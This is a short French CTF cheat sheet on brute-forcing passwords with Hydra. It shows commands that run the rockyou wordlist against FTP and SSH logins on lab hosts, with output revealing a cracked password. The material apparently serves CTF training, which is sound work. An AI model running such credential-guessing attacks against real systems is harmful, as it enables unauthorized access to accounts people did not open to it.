Bruteforce password

Le travail de bruteforce est assez rare dans des challs car rarement utile (peu d’intérêt). Toutefois, ça arrive et comme hydra et John sont pas simple à utiliser, on va cheatshit !

Hydra

Hydra ftp

┌──(kali㉿LuKaLi)-[~/Agentsudoctf]
└─$ hydra -P /usr/share/wordlists/rockyou.txt -l chris ftp://$ip

Hydra ssh

Cette partie demande d’avoir quand même un compte utilisateur. Le BF user/password serait iréaliste.

┌──(kali㉿kali)-[~/ EasyCTF]
└─$ hydra -P /usr/share/wordlists/rockyou.txt -l mitch ssh://easyctf.thm:2222

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-20 13:17:19
[DATA] attacking ssh://easyctf.thm:2222/
[2222][ssh] host: easyctf.thm   login: mitch   password: secret
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-20 13:17:28